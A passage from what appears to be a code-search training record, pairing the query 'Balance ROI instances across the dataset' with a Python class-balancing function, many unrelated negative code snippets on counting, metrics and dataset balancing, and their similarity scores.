i in xrange(num_obj) if 50000 > bbox[i, -1] > self.area_thresh[curr_class]] # here changes max from 10000\n\n # if no blobs / objects were found\n if len(good_idx) == 0:\n return None, None\n good_idx = np.hstack(good_idx)\n\n # Zero out all detections on the image\n for i in set(np.arange(num_obj)).symmetric_difference(good_idx):\n output[output == i] = 0\n\n stats = {}\n stats['count'] = len(good_idx)\n stats['bbox'] = bbox[good_idx] #(tl_x, tl_y, width, height, area)\n stats['centroid'] = centroids[good_idx].astype(np.int32)\n\n # keep track of how to map labels to stats indices\n idx_map={}\n count=0\n for i in range(0,len(good_idx)):\n idx_map[good_idx[i]]=i+1\n\n for i in range(0,len(good_idx)):\n output[output==good_idx[i]]=idx_map[good_idx[i]]\n\n return stats, output", "def purity_score(clusters, classes):\n clusters = np.array(clusters)\n classes = np.array(classes)\n A = np.c_[(clusters,classes)]\n\n n_accurate = 0.\n\n for j in np.unique(A[:,0]):\n z = A[A[:,0] == j, 1]\n x = np.argmax(np.bincount(z))\n n_accurate += len(z[z == x])\n\n return n_accurate / A.shape[0]", "def getMetricsClass(pred_bboxes, gt_bboxes, nclasses):\r\n aps = []\r\n iou = []\r\n for cls in range(nclasses):\r\n if bool(pred_bboxes):\r\n if len(pred_bboxes[0]) == 4: \r\n avg_precision_class, iou_class = getMetrics(pred_bboxes, gt_bboxes)\r\n if len(pred_bboxes[0]) == 5:\r\n avg_precision_class, iou_class = getMetrics(pred_bboxes, gt_bboxes, confidence = True)\r\n else:\r\n avg_precision_class = 0\r\n iou_class = 0\r\n\r\n aps.append(avg_precision_class)\r\n iou.append(iou_class)\r\n \r\n return np.mean(aps), np.mean(iou)", "def count():", "def get_counts(self):\n counts = [0, 0]\n for i in range(self._num_rows):\n for j in range(self._num_cols):\n if self._board[i][j] == \"B\":\n counts[0] += 1\n elif self._board[i][j] == \"W\":\n counts[1] += 1\n return counts", "def get_num_classes(hparams):\n num_classes_map = {\n 'imagenet': 1000,\n 'cifar10': 10,\n }\n if hparams.input_data.input_fn not in num_classes_map:\n raise ValueError(\n f'Unknown number of classes for input_fn {hparams.input_data.input_fn}')\n return num_classes_map[hparams.input_data.input_fn]", "def score_all(results):\n Y = np.concatenate([results['%dtest'%n] for n in range(10)])\n print score(np.concatenate([results['%dtrain'%n] for n in range(10)]))\n print score(np.concatenate([results['%dtest'%n] for n in range(10)]))\n class_counts = np.asarray([(Y[:,0]==n).sum() for n in range(10)])\n return confusion_matrix(Y[:,0],Y[:,1]), class_counts", "def calc_priors(categories, data):\n counts = np.zeros(categories)\n for val in range(categories):\n counts[val] = np.count_nonzero(data.labels == val)\n return counts / len(data.labels)", "def stats():\n class_counts = {}\n convert_dict = {\n 'Amenity': 'amenities',\n 'State': 'states',\n 'City': 'cities',\n 'User': 'users',\n 'Place': 'places',\n 'Review': 'reviews'\n }\n\n for _class in convert_dict.keys():\n class_counts[convert_dict[_class]] = storage.count(_class)\n\n return jsonify(class_counts)", "def raw_counts(self):\n return np.array([1, 2, 3])", "def raw_counts(self):\n return np.array([1, 2, 3])", "def number_of_running_metrics(self):\n try:\n return len(self.get_classads(\"OSGRSV==\\\"metrics\\\"\"))\n except TypeError:\n self.rsv.log(\"ERROR\", \"Classad parsing failed, unable to count running metrics\")", "def classify(cls, i):\r\n sums = [0,0]\r\n sums[int(WekaClassifier_0.classify(i))] += 1.2134644010075073\r\n sums[int(WekaClassifier_1.classify(i))] += 0.57177685574344\r\n sums[int(WekaClassifier_2.classify(i))] += 0.40154496884580815\r\n sums[int(WekaClassifier_3.classify(i))] += 0.35999934750119333\r\n sums[int(WekaClassifier_4.classify(i))] += 0.36937329276984643\r\n sums[int(WekaClassifier_5.classify(i))] += 0.16351990613377496\r\n sums[int(WekaClassifier_6.classify(i))] += 0.1396078832952814\r\n sums[int(WekaClassifier_7.classify(i))] += 0.15882943193304253\r\n sums[int(WekaClassifier_8.classify(i))] += 0.1284505298097081\r\n sums[int(WekaClassifier_9.classify(i))] += 0.09903161346969916\r\n sums[int(WekaClassifier_10.classify(i))] += 0.19672733155497407\r\n sums[int(WekaClassifier_11.classify(i))] += 0.17672847093616786\r\n sums[int(WekaClassifier_12.classify(i))] += 0.18729151620386228\r\n sums[int(WekaClassifier_13.classify(i))] += 0.24810462685136855\r\n sums[int(WekaClassifier_14.classify(i))] += 0.23706555932983922\r\n sums[int(WekaClassifier_15.classify(i))] += 0.14276017880034322\r\n sums[int(WekaClassifier_16.classify(i))] += 0.2655207144416779\r\n sums[int(WekaClassifier_17.classify(i))] += 0.24759035974335297\r\n sums[int(WekaClassifier_18.classify(i))] += 0.14255881855351965\r\n sums[int(WekaClassifier_19.classify(i))] += 0.1181101393342422 \r\n return float(sums[0] - sums[1])", "def get_count(cls):\n total = 0\n for counter in SimpleCounterShard.objects.all():\n total += counter.count\n return total", "def count_labels(labels, num_classes):\n return np.array([\n np.bincount(segment_labels, minlength=num_classes) for _, segment_labels in labels\n ])", "def num_regions(image_data):\n if len(image_data.shape) > 2:\n image_data = skimage.color.rgb2gray(image_data)\n _, num_labels = ndimage.label(image_data)\n return num_labels", "def __len__(self):\n if self.TRAIN_BOOL is True:\n count = len(self.dict_batch_1[b'data'])\n count += len(self.dict_batch_2[b'data'])\n count += len(self.dict_batch_3[b'data'])\n count += len(self.dict_batch_4[b'data'])\n count += len(self.dict_batch_5[b'data'])\n else:\n count = len(self.dict_batch_test[b'data'])\n return count", "def accuracy(self):\n # Initialize key variables\n correct = {}\n prediction = 0\n cls_count = {}\n accuracy = {}\n\n # Analyze all the data\n for cls in self.pca_object.classes():\n # Get list of x values to test\n vectors = self.pca_object.xvalues(cls)\n\n # Process each vector\n for vector in vectors:\n # Get the prediction\n prediction = self.classifier(vector)\n\n # Only count definitive predictions\n if prediction is not None:\n # Count the number of correct predictions\n if prediction == cls:\n if cls in correct:\n correct[cls] += 1\n else:\n correct[cls] = 1\n\n # Increment the count\n if cls in cls_count:\n cls_count[cls] += 1\n else:\n cls_count[cls] = 1\n\n # Calculate per class accuracy\n correct[None] = 0\n cls_count[None] = 0\n for cls in cls_count.keys():\n if cls_count[cls] != 0:\n accuracy[cls] = correct[cls] / cls_count[cls]\n\n # Keep a tally for all successes\n correct[None] = correct[None] + correct[cls]\n cls_count[None] = cls_count[None] + cls_count[cls]\n\n # Calulate overall accuracy\n accuracy[None] = correct[None] / cls_count[None]\n\n # Return\n return accuracy", "def getCounts(self):\n ret = [0]*len(self.numToLabel)\n for block in self.blocks:\n for label in block[1]: ret[label] += 1\n return ret", "def test(self, samples):\n prediction_errors = np.zeros(len(samples), int)\n predictions = np.zeros(len(samples), int)\n class_predictions = np.zeros(self.class_count)\n \n for i in range(len(samples)): # Loop over each sample\n for j in range(self.class_count): # Loop over each class\n class_predictions[j] = self.p_ys[j] # Get p(y) for class j\n \n # Multiply p(y) by p(xi|y) \n class_predictions[j] += np.dot(samples[i,:-1], self.p_xi_given_ys[j]) \n \n predictions[i] = np.argmax(class_predictions) # Prediction is class with highest probability.\n \n # Check if the predicted class doesn't match the true class.\n if(predictions[i] != samples[i][-1]):\n prediction_errors[i] = 1 \n \n # Compute accuracy\n accuracy = 1.0 - (np.sum(prediction_errors) * 1.0 / len(prediction_errors)) \n \n return prediction_errors, predictions, accuracy", "def count(self):\n \n return len(self.img_lst)", "def _number_states_in_pclass(n_modes, pclass):\n out = fact(n_modes) / fact(n_modes - len(pclass))\n out /= _compute_mu_factor2(_lengths_groupings(pclass))\n return out.astype(int)", "def class_nodes(self):\r\n # timing is stored by node, we compute timing by class on demand\r\n rval = {}\r\n for node, count in self.apply_callcount.items():\r\n typ = type(node.op)\r\n rval.setdefault(typ, 0)\r\n rval[typ] += 1\r\n return rval", "def test_counts(self):\n c = array([5,0,1,1,5,5])\n obs = counts(c)\n exp = array([1,2,0,0,0,3])\n self.assertEqual(obs, exp)\n d = array([2,2,1,0])\n obs = counts(d, obs)\n exp = array([2,3,2,0,0,3])\n self.assertEqual(obs, exp)", "def raw_counts(self):\n return np.array([[1, 2], [3, 4], [5, 6]])", "def __sample_count(samples: Samples, sample_result: Literal[\"true\", \"false\"]) -> int:\n return len([sample for sample in samples if sample[\"success\"] == sample_result])" ]
[ "0.6769185", "0.6670084", "0.6666405", "0.6666405", "0.6666405", "0.6578789", "0.6500897", "0.64842236", "0.6412822", "0.63247687", "0.6280898", "0.6262814", "0.62501544", "0.6188363", "0.6161805", "0.6135146", "0.6125166", "0.6116448", "0.60772496", "0.6040804", "0.60212356", "0.6016649", "0.60124046", "0.600877", "0.600877", "0.6008631", "0.59963614", "0.59748554", "0.59655774", "0.5942847", "0.59368145", "0.59252775", "0.5912391", "0.5912391", "0.5900119", "0.58792335", "0.58783996", "0.587202", "0.5871406", "0.5866115", "0.5857809", "0.58316314", "0.5824779", "0.5818189", "0.5805377", "0.57989544", "0.57947576", "0.57793695", "0.577439", "0.5774136", "0.57584333", "0.5754318", "0.5744336", "0.57434714", "0.5736308", "0.57333374", "0.5727899", "0.57243896", "0.5712407", "0.56994927", "0.5697707", "0.56895053", "0.568553", "0.56713635", "0.56626344", "0.56548154", "0.56536585", "0.5649191", "0.5646447", "0.5634072", "0.5632619", "0.56314677", "0.56287336", "0.5619157", "0.5611349", "0.5600389", "0.5585762", "0.55816126", "0.55814177", "0.55806494", "0.55698895", "0.5569031", "0.5566995", "0.55632114", "0.55632114", "0.5558024", "0.5523926", "0.5518037", "0.55153275", "0.5514431", "0.5511272", "0.5509461", "0.5505697", "0.54977953", "0.54973257", "0.5494107", "0.5487905", "0.54840815", "0.5482737", "0.54765296" ]
0.73258656
0
Balance ROI instances across the dataset
def balance_classes(self, classids): # Get ROI class counts for each sample patch: samples = self.SampleID counts = self.count_classes(samples) counts = counts[:, classids] totalcount = np.sum(counts, axis=0) # Find the class with minimum and maximum total count: c_min = np.argmin(totalcount) c_max = np.argmax(totalcount) # Class balancing is performed as long as the min-max class ratio is # not within 50%. # # Balancing Algorithm: # * Randomly sample from samples with non-zero min-class ROI counts # and zero maximum class ROIs. # * Simulaneously, randomly sample a subset of max-class only samples # to be removed from the dataset. This levels the field from both # directions. class_ratio = totalcount[c_min] / totalcount[c_max] while (class_ratio < 0.5) & (len(samples) < 3*5000): # Find samples with maximum min-max class ratio: N = np.sum((counts[:,c_min] > 0) & (counts[:,c_max] == 0)) M = int(0.5*N) # Min-class samples to add: min_sample = np.nonzero((counts[:,c_min]>0) & (counts[:,c_max]==0)) min_sample = min_sample[0] # Unfold tuple min_sample = min_sample[np.random.randint(0, len(min_sample)-1, N)] # Max-class samples to remove: max_sample = np.nonzero((counts[:,c_min]==0) & (counts[:,c_max]>0)) max_sample = max_sample[0] # Unfold tuple max_sample = max_sample[np.random.randint(0, len(max_sample)-1, M)] max_sample = np.unique(max_sample) # Construct new sample set: min_sample = samples[min_sample] samples = np.append(np.delete(samples, max_sample), min_sample) # Recompute total count and min-max class ratio: counts = self.count_classes(samples)[:, classids] totalcount = np.sum(counts, axis=0) c_min = np.argmin(totalcount) c_max = np.argmax(totalcount) class_ratio = totalcount[c_min] / totalcount[c_max] # Done, balanced, update samples: balancedset = self.Samples[samples,:] self._set_sampling_scheme_(balancedset)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def balanceData(dataPath,dataPathFile):\r\n \r\n databaseDict = loadData(os.path.join(dataPath,dataPathFile))\r\n classes = 7\r\n balancedDict = {}\r\n \r\n print('Start Balancing data')\r\n for fold in databaseDict.keys():\r\n fold_dic_not_balanced = databaseDict[fold]\r\n targetsVec = fold_dic_not_balanced['Targets']\r\n classesList = [[] for i in range(classes)]\r\n \r\n foldKeys = fold_dic_not_balanced.keys()\r\n print(foldKeys)\r\n \r\n if list(foldKeys)[0] == 'images':\r\n data = fold_dic_not_balanced['images']\r\n else:\r\n data = fold_dic_not_balanced['data']\r\n data2 = fold_dic_not_balanced['data2']\r\n \r\n \r\n cont = 0\r\n indx = 0\r\n for tgt in targetsVec:\r\n classesList[int(tgt)].append(indx)\r\n indx += 1\r\n \r\n instances = []\r\n for classinst in classesList:\r\n instances.append(len(classinst))\r\n \r\n instances = np.array(instances)\r\n org_instances = np.sort(instances)\r\n \r\n print(org_instances)\r\n \r\n min_inst = org_instances[1]\r\n print(min_inst)\r\n time.sleep(5)\r\n \r\n chann = 0\r\n for classinst in classesList:\r\n shuffledInst = np.array(classinst)\r\n np.random.shuffle(shuffledInst)\r\n cont2 = 0\r\n for j in shuffledInst[:min_inst]:\r\n aux_data = np.expand_dims(data[:,j,:],axis=1)\r\n aux_targ = targetsVec[j]\r\n if cont > 0:\r\n balancedData = np.append(balancedData,aux_data,axis=1)\r\n balancedTargets = np.append(balancedTargets,aux_targ)\r\n if list(foldKeys)[0] != 'images':\r\n balancedData_2 = np.append(balancedData_2,\r\n np.expand_dims(data2[:,j,:],\r\n axis=1))\r\n else:\r\n balancedData = aux_data\r\n balancedTargets = aux_targ\r\n if list(foldKeys)[0] != 'images':\r\n balancedData_2 = np.expand_dims(data2[:,j,:],axis=1)\r\n cont += 1\r\n cont2 += 1\r\n print('Fold: ',fold, 'Channel: ',chann, 'Image num: ',cont2)\r\n chann += 1\r\n\r\n foldDict = {}\r\n foldDict['Targets'] = balancedTargets\r\n foldDict['instances'] = org_instances\r\n if list(foldKeys)[0] == 'images':\r\n foldDict['images'] = balancedData\r\n else:\r\n foldDict['data'] = balancedData\r\n foldDict['data2'] = balancedData_2\r\n \r\n balancedDict[fold] = foldDict\r\n \r\n\r\n savePath = os.path.join(dataPath,'balancedData',dataPathFile)\r\n pickle.dump(balancedDict, open(savePath, 'wb'), pickle.HIGHEST_PROTOCOL)\r\n print('Saved Balanced dataBase') \r\n \r\n return balancedDict", "def balance_dataset(dataset):\n \n print(\"Balancing dataset...\")\n n = len(dataset)\n labels = ch.Tensor([dataset[i][1] for i in range(n)]).int()\n n0 = sum(labels).item()\n I_pos = labels == 1\n\n idx = ch.arange(n)\n idx_pos = idx[I_pos]\n ch.manual_seed(0)\n I = ch.randperm(n - n0)[:n0]\n idx_neg = idx[~I_pos][I]\n idx_bal = ch.cat([idx_pos, idx_neg],dim=0)\n return Subset(dataset, idx_bal)", "def test_pandas_occupancy_balance(self):\n data = load_occupancy(return_dataset=True)\n X, y = data.to_pandas()\n\n # Create and fit the visualizer\n oz = ClassBalance()\n assert oz.fit(y) is oz\n\n # oz.finalize()\n self.assert_images_similar(oz)", "def ComputeRegenerativeBraking(self):\r\n pass", "def __balance_data(self):\n # Shuffle each class independently (This is useful in case of multiple root directories because it does not\n # discard only elements of the last listed root directory, but random elements of all root directories)\n start_index = 0\n for class_id, num_samples_in_this_class in enumerate(self.__samples_per_class):\n permutation = np.random.permutation(num_samples_in_this_class)\n self.__image_file_names[start_index:start_index + num_samples_in_this_class] = \\\n self.__image_file_names[start_index:start_index + num_samples_in_this_class][permutation]\n start_index += num_samples_in_this_class\n\n class_with_min_samples = np.argmin(self.__samples_per_class)\n num_min_samples = self.__samples_per_class[class_with_min_samples]\n\n # Remove all elements in the majority classes in order to balance their sample numbers to the minority class.\n start_index = 0\n elements_to_delete = []\n for num_samples_in_this_class in self.__samples_per_class:\n new_indices_to_delete = [i for i in\n range(start_index + num_min_samples, start_index + num_samples_in_this_class)]\n elements_to_delete.extend(new_indices_to_delete)\n start_index += num_samples_in_this_class\n\n self.__labels = np.delete(self.__labels, elements_to_delete)\n self.__image_file_names = np.delete(self.__image_file_names, elements_to_delete)\n\n # Check for class balance.\n cumulator = np.zeros(shape=3)\n for label in self.__labels:\n cumulator[label] += 1\n for i in range(2):\n if cumulator[i] != cumulator[i + 1]:\n raise RuntimeError(\"Error in data balancing: resulting label distribution: {}\".format(cumulator))\n\n self.__samples_per_class = [num_min_samples for _ in range(self.num_classes)]", "def balance_set(X, Y, adr_labels_size, nonadr_labels_size):\n\n print(\"Performing Class Balancing...\")\n adr_samples_needed = nonadr_labels_size - adr_labels_size\n new_X = []\n new_Y = []\n adr_labels_size = 0\n nonadr_labels_size = 0\n\n for index, example in enumerate(X):\n if adr_samples_needed > 0:\n if Y[index] == ADR_MENTION_CLASS_LABEL:\n new_X.append(example) # add original 'ADR' sample\n new_Y.append(ADR_MENTION_CLASS_LABEL)\n new_X.append(example) # add duplicate 'ADR' sample to perform Over-Sampling\n new_Y.append(ADR_MENTION_CLASS_LABEL)\n\n adr_labels_size += 2\n adr_samples_needed -= 1\n else:\n # we don't add original 'No ADR Mention' sample to perform Under-Sampling\n adr_samples_needed -= 1\n\n else:\n if Y[index] == ADR_MENTION_CLASS_LABEL:\n adr_labels_size += 1\n else:\n nonadr_labels_size += 1\n\n new_X.append(example) # add original sample\n new_Y.append(Y[index]) # add original label\n\n print(\" Updated dataset size: {}\".format(len(new_X)))\n print(\" {} class size: {}\".format(ADR_MENTION_CLASS_NAME, adr_labels_size))\n print(\" {} class size: {}\".format(NON_ADR_MENTION_CLASS_NAME, nonadr_labels_size))\n\n return new_X, new_Y", "def handle_imbalance(dataset, minority_class):\n for i, l in enumerate(dataset):\n if l == minority_class:\n dataset[i] = 2\n return dataset", "def test_quick_method_with_splits(self):\n dataset = make_fixture(binary=False, split=True)\n\n viz = class_balance(dataset.y.train, dataset.y.test, show=False)\n\n assert isinstance(viz, ClassBalance)\n self.assert_images_similar(viz)", "def test_multiclass_balance(self):\n dataset = make_fixture(binary=False, split=False)\n\n oz = ClassBalance()\n assert oz.fit(dataset.y) is oz\n assert oz._mode == BALANCE\n\n # oz.finalize()\n self.assert_images_similar(oz)", "def test_numpy_occupancy_balance(self):\n data = load_occupancy(return_dataset=True)\n X, y = data.to_numpy()\n\n # Create and fit the visualizer\n oz = ClassBalance()\n assert oz.fit(y) is oz\n\n # oz.finalize()\n self.assert_images_similar(oz)", "def test_quick_method(self):\n data = load_occupancy(return_dataset=True)\n _, y = data.to_numpy()\n\n visualizer = balanced_binning_reference(y, show=False)\n\n assert isinstance(visualizer, BalancedBinningReference)\n self.assert_images_similar(visualizer, tol=0.5)", "def test_binary_balance(self):\n dataset = make_fixture(binary=True, split=False)\n\n oz = ClassBalance()\n assert oz.fit(dataset.y) is oz\n assert oz._mode == BALANCE\n\n # oz.finalize()\n self.assert_images_similar(oz)", "def returnBalances(self):\n pass", "def my_rebalance(context,data):\n log.info(\"rebalancing...\")\n context.output = pipeline_output('my_pipeline')\n log.info(\"retrieved pipeline output...\")\n \n # These are the securities that we are interested in trading each day.\n context.security_list = context.output.index\n \n if context.prime == False:\n order_target_percent(symbol('SPY'),1) #hold SPY as a default \n context.prime = True\n \n weight= 1.0/len(context.security_list)\n \n for stock in context.security_list:\n log.info(\"Buying %s\" % (stock.symbol))\n order_target_percent(stock, weight)\n \n #: Exit any positions we might have\n for stock in context.portfolio.positions:\n if data.can_trade(stock) and stock not in context.security_list:\n log.info(\"Exiting our positions on %s\" % (stock.symbol))\n order_target_percent(stock, 0)", "def test_quick_method(self):\n dataset = make_fixture(binary=False, split=False)\n\n viz = class_balance(dataset.y, show=False)\n\n assert isinstance(viz, ClassBalance)\n self.assert_images_similar(viz, tol=0.5)", "def balance_dataset_sampling(instances):\n probabilities = get_balancing_probabilities(instances)\n new_instances = [ (features, classification) \n for features, classification in instances \n if random.random() < probabilities[classification] ]\n\n return new_instances", "def calculate_ec2_ris(session, results):\n ec2_conn = session.client('ec2')\n\n\n paginator = ec2_conn.get_paginator('describe_instances')\n page_iterator = paginator.paginate(\n Filters=[{'Name': 'instance-state-name', 'Values': ['running']}])\n\n # Loop through running EC2 instances and record their AZ, type, and\n # Instance ID or Name Tag if it exists.\n for page in page_iterator:\n for reservation in page['Reservations']:\n for instance in reservation['Instances']:\n # Ignore spot instances\n if 'SpotInstanceRequestId' not in instance:\n #az = instance['Placement']['AvailabilityZone']\n instance_type = instance['InstanceType']\n # Check for 'skip reservation' tag and name tag\n found_skip_tag = False\n instance_name = None\n cloud_bill_review_comment = None\n if 'Tags' in instance:\n for tag in instance['Tags']:\n if tag['Key'] == 'Name' and len(tag['Value']) > 0:\n instance_name = tag['Value'] \n if tag['Key'] == 'CloudBillReviewComment' and len(tag['Value']) > 0:\n cloud_bill_review_comment = tag['Value'] \n \n instancekey = instance['InstanceId'] if not instance_name else instance_name \n #print(instancekey)\n\n #if instance_type == 't2.small':\n # print('instance type: %s instance_id: %s' %(instance_type, instancekey))\n\n if cloud_bill_review_comment:\n tags[instancekey] = cloud_bill_review_comment\n #print(tags[instancekey])\n cloud_bill_review_comment = None\n\n results['ec2_running_instances'][(instance_type)] = \\\n results['ec2_running_instances'].get((instance_type), 0) + 1\n \n instance_ids[(instance_type)].append(\n instance['InstanceId'] if not instance_name\n else instance_name)\n\n #print(instance_ids[('t2.small')])\n\n\n # Loop through active EC2 RIs and record their AZ and type.\n for reserved_instance in ec2_conn.describe_reserved_instances(\n Filters=[{'Name': 'state', 'Values': ['active']}])['ReservedInstances']:\n # Detect if an EC2 RI is a regional benefit RI or not\n\n instance_type = reserved_instance['InstanceType']\n\n results['ec2_reserved_instances'][(\n instance_type)] = results['ec2_reserved_instances'].get(\n (instance_type), 0) + reserved_instance['InstanceCount']\n\n reserve_expiry[(instance_type)].append(calc_expiry_time(\n expiry=reserved_instance['End']))\n \n\n return results", "def _balance(self):\n\n # first try to load disk object to memory\n while (\n self._in_memory_objects.memory_usage < self._memory_threshold\n and len(self._disk_objects) > 0\n ):\n node = self._disk_objects.pop_last()\n bucket_object = node.value\n # remove object from inverted dict\n self._object_to_list_node.pop(bucket_object)\n # load object from memory\n bucket_object.value = bucket_object.load_value()\n self._object_to_list_node[bucket_object] = node\n self._in_memory_objects.add_first(node)\n # then persist extra objects to disk based on LRU rule\n while self._in_memory_objects.memory_usage > self._memory_threshold:\n node = self._in_memory_objects.pop_first()\n bucket_object = node.value\n # remove object from inverted dict\n self._object_to_list_node.pop(bucket_object)\n # persist object to disk, update bucket_object's value\n disk_value = bucket_object.bucket.persist_value(bucket_object.value)\n bucket_object.value = disk_value\n self._object_to_list_node[bucket_object] = node\n self._disk_objects.append(node)", "def test_no_impact_between_tenants(self):\n field = 'body'\n indexMap, createIndexTasklist = self.indexUtil.create_gsi_on_each_collection(self.cluster,\n replica=self.index_replicas,\n defer=False,\n number_of_indexes_per_coll=self.index_count,\n field=field, sync=False)\n for taskInstance in createIndexTasklist:\n self.task.jython_task_manager.get_task_result(taskInstance)\n self.log.debug(\"Getting initial RR values\")\n stat_obj_list = self.create_Stats_Obj_list()\n stat_field = 'resident_ratio'\n initial_rr_value_map = self.get_plasma_index_stat_value(stat_field, stat_obj_list)\n\n bucket_list = []\n bucket_list.append(self.cluster.buckets[0])\n\n query_tasks_info = self.indexUtil.run_full_scan(self.cluster, indexMap, key='body', totalCount=self.init_items_per_collection,\n limit=self.query_limit)\n for taskInstance in query_tasks_info:\n self.task.jython_task_manager.get_task_result(taskInstance)\n\n newIndexMap, newcreateIndexTasklist = self.indexUtil.create_gsi_on_each_collection(self.cluster,buckets=bucket_list,\n replica=self.index_replicas,\n defer=False,\n number_of_indexes_per_coll=2 * self.index_count,\n count=self.index_count,\n field=field, sync=False)\n for taskInstance in newcreateIndexTasklist:\n self.task.jython_task_manager.get_task_result(taskInstance)\n\n final_rr_value_map = self.get_plasma_index_stat_value(stat_field, stat_obj_list)\n self.compareRR(initial_rr_value_map, final_rr_value_map)", "def test_no_impact_between_tenants(self):\n field = 'body'\n indexMap, createIndexTasklist = self.indexUtil.create_gsi_on_each_collection(self.cluster,\n replica=self.index_replicas,\n defer=False,\n number_of_indexes_per_coll=self.index_count,\n field=field, sync=False)\n for taskInstance in createIndexTasklist:\n self.task.jython_task_manager.get_task_result(taskInstance)\n self.log.debug(\"Getting initial RR values\")\n stat_obj_list = self.create_Stats_Obj_list()\n stat_field = 'resident_ratio'\n initial_rr_value_map = self.get_plasma_index_stat_value(stat_field, stat_obj_list)\n\n bucket_list = []\n bucket_list.append(self.cluster.buckets[0])\n\n query_tasks_info = self.indexUtil.run_full_scan(self.cluster, indexMap, key='body', totalCount=self.init_items_per_collection,\n limit=self.query_limit)\n for taskInstance in query_tasks_info:\n self.task.jython_task_manager.get_task_result(taskInstance)\n\n newIndexMap, newcreateIndexTasklist = self.indexUtil.create_gsi_on_each_collection(self.cluster,buckets=bucket_list,\n replica=self.index_replicas,\n defer=False,\n number_of_indexes_per_coll=2 * self.index_count,\n count=self.index_count,\n field=field, sync=False)\n for taskInstance in newcreateIndexTasklist:\n self.task.jython_task_manager.get_task_result(taskInstance)\n\n final_rr_value_map = self.get_plasma_index_stat_value(stat_field, stat_obj_list)\n self.compareRR(initial_rr_value_map, final_rr_value_map)", "def attribute_irrigation():\n fc = ee.FeatureCollection(IRRIGATION_TABLE)\n for state in TARGET_STATES:\n for yr in range(2011, 2021):\n images = os.path.join(ASSET_ROOT, '{}_{}'.format(state, yr))\n coll = ee.Image(images)\n tot = coll.select('classification').remap([0, 1, 2, 3], [1, 0, 0, 0])\n means = tot.reduceRegions(collection=fc,\n reducer=ee.Reducer.mean(),\n scale=30)\n\n task = ee.batch.Export.table.toCloudStorage(\n means,\n description='{}_{}'.format(state, yr),\n bucket='wudr',\n fileNamePrefix='attr_{}_{}'.format(state, yr),\n fileFormat='CSV')\n\n print(state, yr)\n task.start()", "def assign_ids(self, instances):\n if len(instances) == 0:\n return #no new detections to check\n\n # Compute iou with either boxes or masks:\n is_crowd = np.zeros((len(instances),), dtype=np.bool)\n if instances[0].bbox is None:\n assert instances[0].mask_rle is not None\n # use mask iou only when box iou is None\n # because box seems good enough\n rles_old = [x.mask_rle for x in self._old_instances]\n rles_new = [x.mask_rle for x in instances]\n ious = mask_util.iou(rles_old, rles_new, is_crowd)\n threshold = 0.5\n else:\n boxes_old = [x.bbox for x in self._old_instances]\n boxes_new = [x.bbox for x in instances]\n ious = mask_util.iou(boxes_old, boxes_new, is_crowd)\n threshold = 0.6\n if len(ious) == 0:\n ious = np.zeros((len(self._old_instances), len(instances)), dtype=\"float32\")\n\n # Only allow matching instances of the same label:\n for old_idx, old in enumerate(self._old_instances):\n for new_idx, new in enumerate(instances):\n if old.label != new.label:\n ious[old_idx, new_idx] = 0\n\n matched_new_per_old = np.asarray(ious).argmax(axis=1)\n max_iou_per_old = np.asarray(ious).max(axis=1)\n\n # Try to find match for each old instance:\n extra_instances = []\n for idx, inst in enumerate(self._old_instances):\n if max_iou_per_old[idx] > threshold:\n newidx = matched_new_per_old[idx]\n if instances[newidx].color is None:\n instances[newidx].color = inst.color\n if instances[newidx].objID is None:\n instances[newidx].objID = inst.objID\n continue\n # If an old instance does not match any new instances,\n # keep it for the next frame in case it is just missed by the detector\n inst.ttl -= 1\n if inst.ttl > 0:\n extra_instances.append(inst)\n\n # Assign random color to newly-detected instances:\n for inst in instances:\n if inst.color is None:\n inst.color = random_color(rgb=True, maximum=1)\n if inst.objID is None:\n #Assign random 32-bit hex key\n inst.objID = ''.join(random.choices(string.ascii_letters + string.digits, k=32))\n self._old_instances = instances[:] + extra_instances\n return [d.objID for d in instances]", "def calc(self):\n self.proc_blocks = [cluster.cells for cluster in self.clusters]\n self.cell_loads = [sum([len(cell) for cell in self.proc_blocks])]\n self.particle_loads = [cluster.np for cluster in self.clusters]\n self.imbalance = LoadBalancer.get_load_imbalance(self.particle_loads)", "def balance_dataset_weighting(instances):\n factors = get_balancing_weight_factors(instances)\n new_instances = [ (features, classification, w * factors[classification]) \n for features, classification, w in instances ]\n return new_instances", "def two_nb(X, y, S, dataset):\n\n\tpreds = pd.DataFrame()\n\troc = pd.DataFrame()\n\n\tcv = KFold(n_splits = 10, shuffle = False)\n\n\tmean_tpr = 0.0\n\tmean_fpr = np.linspace(0, 1, 100)\n\n\tgnb_pos = GaussianNB()\n\tgnb_neg = GaussianNB()\n\n\tfor train, test in cv.split(X):\n\t\tX_train, X_test = X.iloc[train], X.iloc[test]\n\t\ty_train, y_test = y[train], y[test]\n\n\t\t# For every train/test split, we further partition each dataset\n\t\t# on the value of the sensitive attribute\n\t\tX_train_pos, y_train_pos, X_train_neg, y_train_neg = split_on_sensitive_attribute(X_train, y_train, S)\n\t\tX_test_pos, y_test_pos, X_test_neg, y_test_neg = split_on_sensitive_attribute(X_test, y_test, S)\n\n\t\t# Train a separate NB classifier on each training set\n\t\tgnb_pos.fit(X_train_pos, y_train_pos)\n\t\tgnb_neg.fit(X_train_neg, y_train_neg)\n\n\t\t# And predict on the test set using the corresponding model,\n\t\t# then combine the predictions\n\t\tpreds_k_pos = gnb_pos.predict(X_test_pos).tolist()\n\t\tpreds_k_neg = gnb_neg.predict(X_test_neg).tolist()\n\t\tpreds_k = preds_k_pos + preds_k_neg\n\n\t\tproba_pos = pd.DataFrame(gnb_pos.predict_proba(X_test_pos))\n\t\tproba_neg = pd.DataFrame(gnb_neg.predict_proba(X_test_neg))\n\t\tproba = pd.concat([proba_pos, proba_neg])\n\n\t\ty_test_reordered = y_test_pos.tolist() + y_test_neg.tolist()\n\t\tfpr, tpr, thresholds = roc_curve(y_test_reordered, proba.iloc[:,1].values)\n\n\t\tmean_tpr += interp(mean_fpr, fpr, tpr)\n\t\tmean_tpr[0] = 0.0\n\n\t\tpreds_df = pd.DataFrame({\n\t\t\t'neg': proba.iloc[:, 0],\n\t\t\t'pos': proba.iloc[:, 1],\n\t\t\t'pred': preds_k,\n\t\t\t'class': y_test_reordered})\n\t\tpreds = preds_df.append(preds)\n\n\tmean_tpr /= 10\n\troc = pd.DataFrame({'tpr': mean_tpr, 'fpr': mean_fpr})\n\t\n\troc.to_csv(\"output/\" + dataset + \"2nb_roc_gnb.csv\", index = False)\n\n\tX_out = X.copy()\n\tnew_idx = range(0, len(X.index))\n\tX_out['idx'] = new_idx\n\tX_out = X_out.set_index(['idx'], drop = 